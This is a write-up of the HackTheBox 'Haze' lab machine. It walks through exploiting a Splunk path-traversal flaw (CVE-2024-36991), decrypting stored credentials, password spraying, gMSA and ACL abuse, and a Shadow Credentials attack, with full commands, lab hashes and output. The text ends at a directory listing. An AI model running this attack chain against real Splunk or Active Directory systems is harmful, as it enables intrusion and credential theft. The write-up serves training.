Haze – HackTheBox Link to heading

  • OS: Windows
  • Difficulty: Hard
  • Platform: HackTheBox

Avatar haze


Summary Link to heading

“Haze” is a Hard machine from HackTheBox platform. The victim machine is running a Domain Controller for an Active Directory environment along with a web server. This web server is running a vulnerable Splunk version to CVE-2024-36991, which allow us to read system files. This allow us to read Splunk configuration files, get a hash, decrypt it and gain access as a first user. We perform a password spray and see that a second user uses exactly the same password for the first user, pivoting to a new user. This new user is part of a group that can modify gMSA accounts. This allow us to gran ourselves permissions to read the gMSA NT hash and take control of a gMSA account. This account can perform a Shadow Credentials attack over a third user, which allow us to extract its NT hash and get access through WinRM service into the victim machine. Once inside the victim machine, we can see it is storing a backup for Splunk service, where we are able to decrypt again credentials for this service. With this action we retrieve credentials for the Splunk service running on the machine. This allow us gain access to the service and upload a malicious application in Splunk and get a reverse shell as a fourth user. This user has SeImpersonatePrivilege, which eventually allow us to elevate our privileges and compromise the system/domain.


User Link to heading

We start running Nmap against the victim machine. We have many multiple ports open; among them we have: 53 DNS, 88 Kerberos, 135 Microsoft RPC, 389 LDAP, 445 SMB, 5985 WinRM, 8000 HTTP, among many others.

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,8000,8088,8089,9389,47001,49664,49665,49666,49667,49668,49672,49679,49680,54337,54342,54344,54357,54398 10.129.229.51

Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 20:26 -03
Nmap scan report for 10.129.229.51
Host is up (0.37s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-31 07:26:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http          Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.229.51:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
8088/tcp  open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-title: 404 Not Found
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-title: splunkd
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49680/tcp open  msrpc         Microsoft Windows RPC
54337/tcp open  msrpc         Microsoft Windows RPC
54342/tcp open  msrpc         Microsoft Windows RPC
54344/tcp open  msrpc         Microsoft Windows RPC
54357/tcp open  msrpc         Microsoft Windows RPC
54398/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-31T07:27:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.73 seconds

Given open ports we can se we are against a machine in an Active Directory environment. Additionally, port 8000 is running Splunk.

Info
Splunk is a big data platform that simplifies the task of collecting and managing massive volumes of machine-generated data and searching for information within it. The technology is used for business and web analytics, application management, compliance, and security.

Using WhatWeb against this site confirms this result:

❯ whatweb -a 3 http://10.129.229.51:8000/

http://10.129.229.51:8000/ [303 See Other] Country[RESERVED][ZZ], HTML5, HTTPServer[Splunkd], IP[10.129.229.51], Meta-Refresh-Redirect[http://10.129.229.51:8000/en-US/], RedirectLocation[http://10.129.229.51:8000/en-US/], Title[303 See Other], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
http://10.129.229.51:8000/en-US/ [303 See Other] Cookies[session_id_8000], Country[RESERVED][ZZ], HTTPServer[Splunkd], HttpOnly[session_id_8000], IP[10.129.229.51], RedirectLocation[http://10.129.229.51:8000/en-US/account/login?return_to=%2Fen-US%2F], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
http://10.129.229.51:8000/en-US/account/login?return_to=%2Fen-US%2F [200 OK] Bootstrap, Cookies[cval,splunkweb_uid], Country[RESERVED][ZZ], HTML5, HTTPServer[Splunkd], IP[10.129.229.51], Meta-Author[Splunk Inc.], Script[text/json], probably Splunk, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

Additionally, we can use NetExec against SMB service of the victim machine to get the domain name and machine name:

❯ nxc smb 10.129.229.51

SMB         10.129.229.51   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)

We have a machine name DC01 and a domain haze.htb.

Add the machine name, domain and FQDN (which is <machine name>.<domain>) to our /etc/hosts file:

❯ echo '10.129.229.51 DC01 DC01.HAZE.HTB HAZE.HTB' | sudo tee -a /etc/hosts

Visiting then http://haze.htb:8000 shows a Splunk login panel:

Haze 1

We note from Nmap output that Splunk is also running on port 8088 and 8089 with HTTPs. Visiting port 8088 does not return anything. Nevertheless, port 8089 (visiting https://haze.htb:8089) shows some information about Splunk itself:

Haze 2

We can see a version for Splunk: 9.2.1.

Searching for splunk 9.2.1 exploit reaches to this page. There, they talk about a vulnerability labeled as CVE-2024-36991 which allow us to read files through a Path Traversal. Additionally, it says that only Splunk versions for Windows should be affected (which is the case). Searching for Proof of Concepts (or “PoCs”) we find this Github repository. Clone it and run it against the target machine:

❯ git clone https://github.com/bigb0x/CVE-2024-36991.git -q

❯ cd CVE-2024-36991

❯ python3 CVE-2024-36991.py -u http://haze.htb:8000

  ______     _______     ____   ___ ____  _  _        _____  __   ___   ___  _
 / ___\ \   / | ____|   |___ \ / _ |___ \| || |      |___ / / /_ / _ \ / _ \/ |
| |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \| '_ | (_) | (_) | |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|________) | (_) \__, |\__, | |
 \____|  \_/  |_____|   |_____|\___|_____|  |_|      |____/ \___/  /_/   /_/|_|

-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.

[INFO] Log directory created: logs
[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

It worked. We have 4 hashes.

We attempt to crack these hashes through a Brute Force Password Cracking with john and Hashcat with rockyou.txt dictionary; but we were not able to crack these hashes.

However, if we read the output from the script, it is attempting to read /etc/passwd file from Splunk. Since the Path Traversal works, we could slightly modify this script to be able to read files in the system as well, or to read any Splunk configuration file we want. The script I have done for this vulnerability can be found at my Github repository. Let’s test if we can read Splunk files. We can get a list of configuration files at Splunk documentation. Additionally, we also find more Splunk documentation or its forum that gives explanation for important files. There, they mention an $SPLUNK_HOME/etc/auth directory, where $SPLUNK_HOME is the base directory for Splunk. Run our script:

❯ python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret'

======================================================================
    CVE-2024-36991

[*] Target URL:   http://haze.htb:8000
[*] File to read: /etc/auth/splunk.secret
[*] Language:     en_us
======================================================================

[*] Target seems to be vulnerable!
[*] Content extracted:

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

Our script worked. We also got a secret for Splunk which might be useful later.

We can also check that this script can read system files adding --system-files flag:

❯ python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/Windows/System32/drivers/etc/hosts' --system-files

======================================================================
    CVE-2024-36991

[*] Target URL:   http://haze.htb:8000
[*] File to read: /Windows/System32/drivers/etc/hosts (System file)
[*] Language:     en_us
======================================================================

[*] Target seems to be vulnerable!
[*] Content extracted:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

After attempting to read some files, we go back to Splunk documentation. For authentication.conf file, documentation talks about a path $SPLUNK_HOME/etc/system/local. Attempting to read this file we get:

❯ python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/etc/system/local/authentication.conf'

======================================================================
    CVE-2024-36991

[*] Target URL:   http://haze.htb:8000
[*] File to read: /etc/system/local/authentication.conf
[*] Language:     en_us
======================================================================

[*] Target seems to be vulnerable!
[*] Content extracted:

[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

We got a hash:

$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

and a distinguishedName for Active Directory (specifically for LDAP):

CN=Paul Taylor,CN=Users,DC=haze,DC=htb

We can quickly check if this user exists with Kerbrute. Create a list with a list of potential users:

❯ cat paul_taylor_options.txt

paul taylor
paul.taylor
p.taylor

and use Kerbrute to check if any of them do exist in the victim machine:

❯ kerbrute userenum -d haze.htb --dc 10.129.229.51 paul_taylor_options.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/31/25 - Ronnie Flathers @ropnop

2025/03/31 02:01:47 >  Using KDC(s):
2025/03/31 02:01:47 >   10.129.229.51:88

2025/03/31 02:01:48 >  [+] VALID USERNAME:       paul.taylor@haze.htb

paul.taylor does exist in the victim machine. Now, we need somewhat to crack the password found at authentication.conf file. It is not crackeable, so do not lose your time attempting to crack it. Searching for tools that can help us to crack this, we find a tool called splunksecrets. To install it, to not break any system packages, I will install it using pipx (here you can check how to install pipx). To install splunksecrets with pipx we run the command:

❯ pipx install 'git+https://github.com/HurricaneLabs/splunksecrets.git'

Once installed, just run splunksecrets command.

❯ splunksecrets --help

Usage: splunksecrets [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  dbconnect-decrypt      Decrypt password used for dbconnect identity
  dbconnect-encrypt      Encrypt password used for dbconnect identity
  phantom-decrypt        Decrypt password used for Phantom asset
  phantom-encrypt        Encrypt password used for Phantom asset
  splunk-decrypt         Decrypt password using Splunk 7.2 algorithm
  splunk-encrypt         Encrypt password using Splunk 7.2 algorithm
  splunk-hash-passwd     Generate password hash for use in...
  splunk-legacy-decrypt  Decrypt password using legacy Splunk algorithm...
  splunk-legacy-encrypt  Encrypt password using legacy Splunk algorithm...

We have many options.

After testing some of them, splunk-legacy-decrypt works. For this to work we need 2 items: 1) A Splunk secret; 2) A ciphertext (encrypted password). Previously, when we were testing our script to read files, we extracted the content of /etc/auth/splunk.secret file. Save that secret into a file in our attacker machine:

❯ echo 'NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD' > splunk.secret

Then, pass the file containing the secret to -S flag and the encrypted password to --ciphertext flag:

❯ splunksecrets splunk-legacy-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='

Ld@p_Auth_Sp1unk@2k24

We got a password: Ld@p_Auth_Sp1unk@2k24.

Check if this password works for paul.taylor user (which we have seen that does exist in the victim machine/domain) with NetExec:

❯ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'

SMB         10.129.229.51   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.51   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

They worked. We have valid credentials for the AD domain.

A curious thing about this machine is that if we attempt to enumerate users through Microsoft RPC service with rpcclient we only get our own user:

❯ rpcclient -U 'paul.taylor%Ld@p_Auth_Sp1unk@2k24' 10.129.229.51 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'

paul.taylor

However, if we use NetExec and --rid-brute for SMB module (and after filtering by what is interesting to us) we get way more users:

❯ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}'

Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

Save those users into a file:

❯ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}' > domain_users.txt

and check if the password for paul.taylor is used by other user in the domain with NetExec:

❯ nxc smb haze.htb -u domain_users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success

SMB         10.129.229.51   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.51   445    DC01             [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.229.51   445    DC01             [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.229.51   445    DC01             [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.229.51   445    DC01             [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.229.51   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.229.51   445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.229.51   445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.229.51   445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.129.229.51   445    DC01             [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE

Besides paul.taylor, we also find that the same password is being used for mark.adams user.

Let’s check if mark.adams can log into the victim machine through WinRM service with NetExec:

❯ nxc winrm haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'

WINRM       10.129.229.51   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.129.229.51   5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

It can.

Therefore, use evil-winrm to log in as mark.adams user:

❯ evil-winrm -i haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mark.adams\Documents>

Also, this user is capable to enumerate more users in the domain with Microsoft RPC service along with rpcclient:

❯ rpcclient -U 'mark.adams%Ld@p_Auth_Sp1unk@2k24' 10.129.229.51 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'

Administrator
Guest
krbtgt
paul.taylor
mark.adams
alexander.green

Why I am telling this? “Out of cameras” I used bloodhound-python to analyze the domain with Bloodhound, but results were bugged: we had less users than usual and groups were enumerated only by their SID (later I discovered it was not a bug, it was intended). What I am telling is that if we attempted to enumerate the domain with Bloodhound only using paul.taylor credentials the scan was incomplete, which makes sense if somehow this user is limited to read ACLs and SIDs in the domain.

Now let’s try to use SharpHound (which can be downloaded from its Github repository) to properly enumerate the domain. Once we download the files and extract its .exe file, upload it into the victim machine using upload function from evil-winrm:

*Evil-WinRM* PS C:\Users\mark.adams\Documents> upload SharpHound.exe

Once uploaded, execute it:

*Evil-WinRM* PS C:\Users\mark.adams\Documents> .\SharpHound.exe -c All

2025-03-31T07:57:09.4419327-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-03-31T07:57:09.6606136-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
<SNIP>

This should generate a .zip file into the current directory:

*Evil-WinRM* PS C:\Users\mark.adams\Documents> dir


    Directory: C:\Users\mark.adams\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/31/2025   7:57 AM          34879 20250331075712_BloodHound.zip
-a----         3/31/2025   7:57 AM           1595 NzBkNGM2ZWYtODFhYy00M2M0LTgzNzMtNmViNTQ1NzJhN2Nk.bin
-a----         3/31/2025   7:55 AM        1556992 SharpHound.exe

Download that file into our attacker machine using download command from evil-winrm:

*Evil-WinRM* PS C:\Users\mark.adams\Documents> download 20250331075712_BloodHound.zip

Info: Downloading C:\Users\mark.adams\Documents\20250331075712_BloodHound.zip to 20250331075712_BloodHound.zip

Info: Download successful!

Once downloaded in our attacker machine, upload the generated .zip file to Bloodhound. In my case I use the Community Edition (or CE). Searching for mark.adams user does not show directly rights over other accounts. However, this user is part of an interesting group called gMSA_Managers:

Haze 3

This could mean that we might have rights over GMSA accounts.

Usually, if we had ReadGMSAPassword rights over an account we can run its NT hash using, for example, NetExec as follows:

❯ nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

SMB         10.129.234.37   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.234.37   636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.234.37   636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.234.37   636    DC01             Account: Haze-IT-Backup$      NTLM:

It found a GMSA account called Haze-IT-Backup, but it did not display its NT hash. This is because we (still) do not have ReadGMSAPassword rights over this account.

Searching how to add ReadGMSAPassword rights to an account we find this blog explaining how to do it. There, they provide the command:

Set-ADServiceAccount `
	-Identity 'SQL_HQ_Primary' `
	-PrincipalsAllowedToRetrieveManagedPassword 'Administrator'

If we are able to add this right (since we are part of gMSA_Managers group), let’s then run the previous command in our evil-winrm session, but modifying it:

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity 'Haze-IT-Backup' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'

We got no output, so maybe it worked and mark.adams now has ReadGMSAPassword rights over Haze-It-Backup account.

Run again the previous command with NetExec to abuse ReadGMSAPassword:

❯ nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

SMB         10.129.234.37   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.234.37   636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.234.37   636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.234.37   636    DC01             Account: Haze-IT-Backup$      NTLM: 735c02c6b2dc54c3c8c6891f55279ebc

This time it worked. We got an NT hash for Haze-IT-Backup$.


Note
Just to be curious, I run bloodhound-python again as HAZE-IT-BACKUP user and, again, I found users that we did not found previously. This is a really interesting detail in this machine.

We execute bloodhound-python (along with faketime and ntpdate to avoid clock errors with Kerberos) in a terminal:

❯ faketime "$(ntpdate -q haze.htb | cut -d ' ' -f 1,2)" bloodhound-python -c ALL -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -ns 10.129.234.37 --zip

<SNIP>

and upload that new .zip file to Bloodhound.


Now, back to Bloodhound we can check what Haze-IT-Backup$ account can do. We get that this account has WriteOwner rights over Support_Services group:

Haze 4

and, at the same time, Support_Services has ForceChangePassword and AddKeyCredentialLink to edward.martin user:

Haze 5

The plan then is simple:

  1. Add ourselves (Haze-IT-Backup$ account) as owners of Support_Service group.
  2. As owners of Support_Service group, add ourselves to this group.
  3. Abuse AddKeyCredentialLink to perform a Shadow Credentials attack over edward.martin user.

First, use owneredit.py from Impacket to add ourselves (Haze-IT-Backup$ account) as owners of the group Support_Service:

❯ impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target 'Support_Services' -dc-ip haze.htb haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!

Second, add ourselves FullControl rights over this group using impacket-dacledit:

❯ impacket-dacledit -principal 'Haze-IT-Backup$' -target 'Support_Services' -action write -rights FullControl -dc-ip haze.htb haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc'

Third, we can use bloodyAD (which can be downloaded here, or with pip install bloodyAD command) to add ourselves to Support_Services group:

❯ bloodyAD --host haze.htb -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' add groupMember 'Support_Services' 'Haze-IT-Backup$'

[+] Haze-IT-Backup$ added to Support_Services

Now we should be able to perform a Shadow Credentials attack over edward.martin user. For this purpose we can use Certipy tool (which can be downloaded here, or running pip3 install certipy-ad) along with faketime and ntpdate to avoid issues with Kerberos:

❯ faketime "$(ntpdate -q haze.htb | cut -d ' ' -f 1,2)" certipy shadow auto -username 'Haze-IT-Backup$'@haze.htb -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account 'edward.martin'

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'edward.martin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '93f3000d-db98-9f29-dbde-99994c848143'
[*] Adding Key Credential with device ID '93f3000d-db98-9f29-dbde-99994c848143' to the Key Credentials for 'edward.martin'
[*] Successfully added Key Credential with device ID '93f3000d-db98-9f29-dbde-99994c848143' to the Key Credentials for 'edward.martin'
[*] Authenticating as 'edward.martin' with the certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Restoring the old Key Credentials for 'edward.martin'
[*] Successfully restored the old Key Credentials for 'edward.martin'
[*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
Note
There is a task running that reestablishes the original group for Haze-IT-Backup$. If we get a permission error we might need to run all the “chain” attack again to grant us privileges to perform Shadow Credentials attack.

Check if we can connect with this user through evil-winrm as edward.martin with the obtained NT hash:

❯ evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents>

We can connect. We can grab the user flag at edward.martin Desktop.


NT Authority/System - Administrator Link to heading

When I entered for the very first time in the machine as mark.adams user through evil-winrm I noticed there was a Backups folder at C:\, but we did not have permissions to check it:

*Evil-WinRM* PS C:\Users\mark.adams\Documents> dir C:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/5/2025  12:32 AM                Backups
d-----         3/25/2025   2:06 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---          3/4/2025  11:28 PM                Program Files
